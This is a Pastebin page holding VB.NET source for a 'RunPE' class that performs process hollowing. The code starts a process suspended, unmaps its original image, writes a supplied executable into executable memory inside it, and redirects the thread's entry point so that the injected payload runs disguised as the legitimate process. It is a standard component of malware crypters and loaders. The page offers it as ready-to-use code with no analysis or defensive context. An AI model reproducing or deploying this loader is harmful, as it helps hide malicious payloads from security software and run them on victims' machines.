Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Imports System.Runtime.InteropServices
- Imports System.Threading
- Imports System.Reflection
- Imports System.Text
- Imports System.Security
- Imports System.Diagnostics
- Class RunPE
- <DllImport("kernel32.dll", EntryPoint:="CreateProcess", CharSet:=CharSet.Unicode), SuppressUnmanagedCodeSecurity> _
- Private Shared Function CreateProcess( _
- ByVal applicationName As String, _
- ByVal commandLine As String, _
- ByVal processAttributes As IntPtr, _
- ByVal threadAttributes As IntPtr, _
- ByVal inheritHandles As Boolean, _
- ByVal creationFlags As UInteger, _
- ByVal environment As IntPtr, _
- ByVal currentDirectory As String, _
- ByRef startupInfo As STARTUP_INFORMATION, _
- ByRef processInformation As PROCESS_INFORMATION) As Boolean
- End Function
- <DllImport("kernel32.dll", EntryPoint:="GetThreadContext"), SuppressUnmanagedCodeSecurity> _
- Private Shared Function GetThreadContext( _
- ByVal thread As IntPtr, _
- ByVal context As Integer()) As Boolean
- End Function
- <DllImport("kernel32.dll", EntryPoint:="SetThreadContext"), SuppressUnmanagedCodeSecurity> _
- Private Shared Function SetThreadContext( _
- ByVal thread As IntPtr, _
- ByVal context As Integer()) As Boolean
- End Function
- <DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory"), SuppressUnmanagedCodeSecurity> _
- Private Shared Function ReadProcessMemory( _
- ByVal process As IntPtr, _
- ByVal baseAddress As Integer, _
- ByRef buffer As Integer, _
- ByVal bufferSize As Integer, _
- ByRef bytesRead As Integer) As Boolean
- End Function
- <DllImport("kernel32.dll", EntryPoint:="WriteProcessMemory"), SuppressUnmanagedCodeSecurity> _
- Private Shared Function WriteProcessMemory( _
- ByVal process As IntPtr, _
- ByVal baseAddress As Integer, _
- ByVal buffer As Byte(), _
- ByVal bufferSize As Integer, _
- ByRef bytesWritten As Integer) As Boolean
- End Function
- <DllImport("ntdll.dll", EntryPoint:="NtUnmapViewOfSection"), SuppressUnmanagedCodeSecurity> _
- Private Shared Function NtUnmapViewOfSection( _
- ByVal process As IntPtr, _
- ByVal baseAddress As Integer) As Integer
- End Function
- <DllImport("kernel32.dll", EntryPoint:="VirtualAllocEx"), SuppressUnmanagedCodeSecurity> _
- Private Shared Function VirtualAllocEx( _
- ByVal handle As IntPtr, _
- ByVal address As Integer, _
- ByVal length As Integer, _
- ByVal type As Integer, _
- ByVal protect As Integer) As Integer
- End Function
- <DllImport("kernel32.dll", EntryPoint:="ResumeThread"), SuppressUnmanagedCodeSecurity> _
- Private Shared Function ResumeThread( _
- ByVal handle As IntPtr) As Integer
- End Function
- <StructLayout(LayoutKind.Sequential, Pack:=1)> _
- Private Structure PROCESS_INFORMATION
- Public ProcessHandle As IntPtr
- Public ThreadHandle As IntPtr
- Public ProcessId As UInteger
- Public ThreadId As UInteger
- End Structure
- <StructLayout(LayoutKind.Sequential, Pack:=1)> _
- Private Structure STARTUP_INFORMATION
- Public Size As UInteger
- Public Reserved1 As String
- Public Desktop As String
- Public Title As String
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=36)> _
- Public Misc As Byte()
- Public Reserved2 As IntPtr
- Public StdInput As IntPtr
- Public StdOutput As IntPtr
- Public StdError As IntPtr
- End Structure
- Public Shared Function Run(ByVal path As String, ByVal cmd As String, ByVal data As Byte(), ByVal compatible As Boolean) As Boolean
- For I As Integer = 1 To 5
- If HandleRun(path, cmd, data, compatible) Then Return True
- Next
- Return False
- End Function
- Private Shared Function HandleRun(ByVal path As String, ByVal cmd As String, ByVal data As Byte(), ByVal compatible As Boolean) As Boolean
- Dim ReadWrite As Integer
- Dim QuotedPath As String = String.Format("""{0}""", path)
- Dim SI As New STARTUP_INFORMATION
- Dim PI As New PROCESS_INFORMATION
- SI.Size = CUInt(Marshal.SizeOf(GetType(STARTUP_INFORMATION)))
- Try
- If String.IsNullOrEmpty(cmd) Then
- If Not CreateProcess(path, QuotedPath, IntPtr.Zero, IntPtr.Zero, False, 4, IntPtr.Zero, Nothing, SI, PI) Then Throw New Exception()
- Else
- QuotedPath = QuotedPath & " " & cmd
- If Not CreateProcess(path, QuotedPath, IntPtr.Zero, IntPtr.Zero, False, 4, IntPtr.Zero, Nothing, SI, PI) Then Throw New Exception()
- End If
- Dim FileAddress As Integer = BitConverter.ToInt32(data, 60)
- Dim ImageBase As Integer = BitConverter.ToInt32(data, FileAddress + 52)
- Dim Context(179 - 1) As Integer
- Context(0) = 65538
- If Not GetThreadContext(PI.ThreadHandle, Context) Then Throw New Exception()
- Dim Ebx As Integer = Context(41)
- Dim BaseAddress As Integer
- If Not ReadProcessMemory(PI.ProcessHandle, Ebx + 8, BaseAddress, 4, ReadWrite) Then Throw New Exception()
- If ImageBase = BaseAddress Then
- If Not NtUnmapViewOfSection(PI.ProcessHandle, BaseAddress) = 0 Then Throw New Exception()
- End If
- Dim SizeOfImage As Integer = BitConverter.ToInt32(data, FileAddress + 80)
- Dim SizeOfHeaders As Integer = BitConverter.ToInt32(data, FileAddress + 84)
- Dim AllowOverride As Boolean
- Dim NewImageBase As Integer = VirtualAllocEx(PI.ProcessHandle, ImageBase, SizeOfImage, 12288, 64)
- If Not compatible AndAlso NewImageBase = 0 Then
- AllowOverride = True
- NewImageBase = VirtualAllocEx(PI.ProcessHandle, 0, SizeOfImage, 12288, 64)
- End If
- If NewImageBase = 0 Then Throw New Exception()
- If Not WriteProcessMemory(PI.ProcessHandle, NewImageBase, data, SizeOfHeaders, ReadWrite) Then Throw New Exception()
- Dim SectionOffset As Integer = FileAddress + 248
- Dim NumberOfSections As Short = BitConverter.ToInt16(data, FileAddress + 6)
- For I As Integer = 0 To NumberOfSections - 1
- Dim VirtualAddress As Integer = BitConverter.ToInt32(data, SectionOffset + 12)
- Dim SizeOfRawData As Integer = BitConverter.ToInt32(data, SectionOffset + 16)
- Dim PointerToRawData As Integer = BitConverter.ToInt32(data, SectionOffset + 20)
- If Not SizeOfRawData = 0 Then
- Dim SectionData(SizeOfRawData - 1) As Byte
- Buffer.BlockCopy(data, PointerToRawData, SectionData, 0, SectionData.Length)
- If Not WriteProcessMemory(PI.ProcessHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
- End If
- SectionOffset += 40
- Next
- Dim PointerData As Byte() = BitConverter.GetBytes(NewImageBase)
- If Not WriteProcessMemory(PI.ProcessHandle, Ebx + 8, PointerData, 4, ReadWrite) Then Throw New Exception()
- Dim AddressOfEntryPoint As Integer = BitConverter.ToInt32(data, FileAddress + 40)
- If AllowOverride Then NewImageBase = ImageBase
- Context(44) = NewImageBase + AddressOfEntryPoint
- If Not SetThreadContext(PI.ThreadHandle, Context) Then Throw New Exception()
- If ResumeThread(PI.ThreadHandle) = -1 Then Throw New Exception()
- Catch
- Dim P As Process = Process.GetProcessById(CInt(PI.ProcessId))
- If P IsNot Nothing Then P.Kill()
- Return False
- End Try
- Return True
- End Function
- End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement